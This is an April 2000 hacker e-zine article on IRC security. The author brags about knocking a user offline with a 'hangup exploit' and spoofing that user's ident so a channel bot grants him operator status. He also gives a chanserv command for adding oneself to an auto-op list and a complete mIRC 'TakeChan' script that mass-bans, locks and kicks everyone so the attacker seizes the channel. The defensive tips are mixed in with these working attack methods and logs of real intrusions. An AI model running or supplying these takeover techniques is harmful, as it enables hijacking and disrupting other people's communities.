   _________ SWAT MAGAZINE ISSUE TWENTY EIGHT APRIL 2000 __________
  /         \___________________________________________/          \
 /	                   IRC Security                             \
/                           by _Smurf_                               \
-----------------------------------------------------------------------

OKay now there is a few things to discuss and i hope Phreakazoid and
Chicane will take some note of this (Owners of #cocytusuk) i will cover
3 main security threats in this part and maybe more in the future.

firstly bots.

now bots with AOP's (auto opped by server/channel) are a threat if they
also op other people like the bots on undernet in #as-mag one called
X is easy to gain op status.
OKay here is how i exploited #as-mag's X bot to give me ops, firstly
i used the same technique as qwaszx used to cut off his modem coz
he wasn't patched, heh dumb twat should read SWAT more often,u can
still use the hangup exploit its funny..
anyway i did it several times b4 i got bored and decided to teest
there Bots security...


ťť crashd (~crashd@host5-99-51-172.btinternet.com) has joined #as-mag
ťť X sets mode: +o crashd
ťť Signoff: crashd (~crashd@host5-99-51-172.btinternet.com) (Write error, closing link)

ťť daveywave (~crashd@host5-99-53-235.btinternet.com) has joined #as-mag
ťť X sets mode: +o daveywave
ťť Signoff: daveywave (~crashd@host5-99-53-235.btinternet.com)
(Ping timeout for daveywave[host5-99-53-235.btinternet.com])

ťť cd (~crashd@host5-99-51-49.btinternet.com) has joined #as-mag
ťť X sets mode: +o cd

hahah it opped me...
ťť X sets mode: +o AS-R-SHIT 

i noticed that the X bot opped him no matter what nick he used and so when
i nuked him the last time i copied his idnt and i was on BTinternet and the
bot opped me. so using CrashD's ident i got opped by the bot which could
then lead on to a channel takeove or adding myself to a aop list.
i am not suggesting tht you should try and annoy #as-mag with this but just
to show that irc bots are not always secure if you need to use one only
allow it to op on a passowrd authentication system as where the person
messages the bot and it will then op them if they have the correct ident
and password.
also other features like the AUTOP feature in Mirc some people in
#cocytusuk have a aop feature which in nice if a mate enters the channel
but not to good if someon with the same ident enters, for example TempesT
has got Viper on his aop list if someone was to change ther ident they
could easily get asop and do a channel takeover or the AOP method mentioned
below. this is hard to stop because its a auto thing which cann't have
a pssword unless it was coded which would make your mirc into more of a
script and would make you into a sorta bot. :o) so lose the aop thing
its pointless and not good security.

second method,
Adding youself to AOP list, on the server i hang out on irc.progenic.com
they have a weak security that allows anyone to ake them self's a AOP,
if they managed to get ops either by social engineering or by using a
spoof technique or the BOT exploit all they would have to do is type
/chanserv access #channell add host Your_nick, where #channel is the
channel you are in and your_nick is your nick. this is easy to stop
and if you do not have a bot or any autoop script then controling ops
should be easy but remember don't have to many ops or you will have
somone who will give ops to any person who enters the channel,
believe me i have seen it done before.

third method is not really a exploit or anything just one of the
things to do if your going to takeover a channel, 
How o take over a channel basic principle, Only leave you there.

here is a litle mirc script.
add this to the channel popup list clcik on the menu's tools,
popups, select view, channel and paste the code below to it.
but remove my coments at the end of it or it won't work... :o)


TakeChan {
  /topic #  TAKEOVER !!! DoN't MeSs WiTh ThE BeSt... $chan is $me 's   | Change topic
  /chanserv access # add deny *!*@*                                    | Use chanserv to ban everyone.
  /mode # +b *!*@*                                                     | just to make sure ban everyone again.
  /mode # +k Locked_BY_Moi                                             | Add a key to the channel
  set %i 1
  :next
  set %nick $nick(#,%i)
  /mode # +b %nick!*@*                                                 | Ban the nick
  if %nick == $null goto done                                          | anyone left?
  if %nick == $me goto miss                                            | ignore me.
  if %nick isop # /ban # %nick                                         | ban any ops.
  /kick # %nick                                                        | Kick him.
  :miss                                                                
  inc %i
  goto next
  :done
  echo 4 FiNiShEd TaKeOvEr By _Smurf_
}


people can use this type of script totakeover a channel and so
then they would have full contraol well they would have some
controal over it but no one else would be able to get it to control
it anyway. this is what we don't wan't happening to our channel so
get a decent script that detects mass bans etc to protect from it.

Anyway thats all for now,

seya all soon

_Smurf_
ICQ: 19084839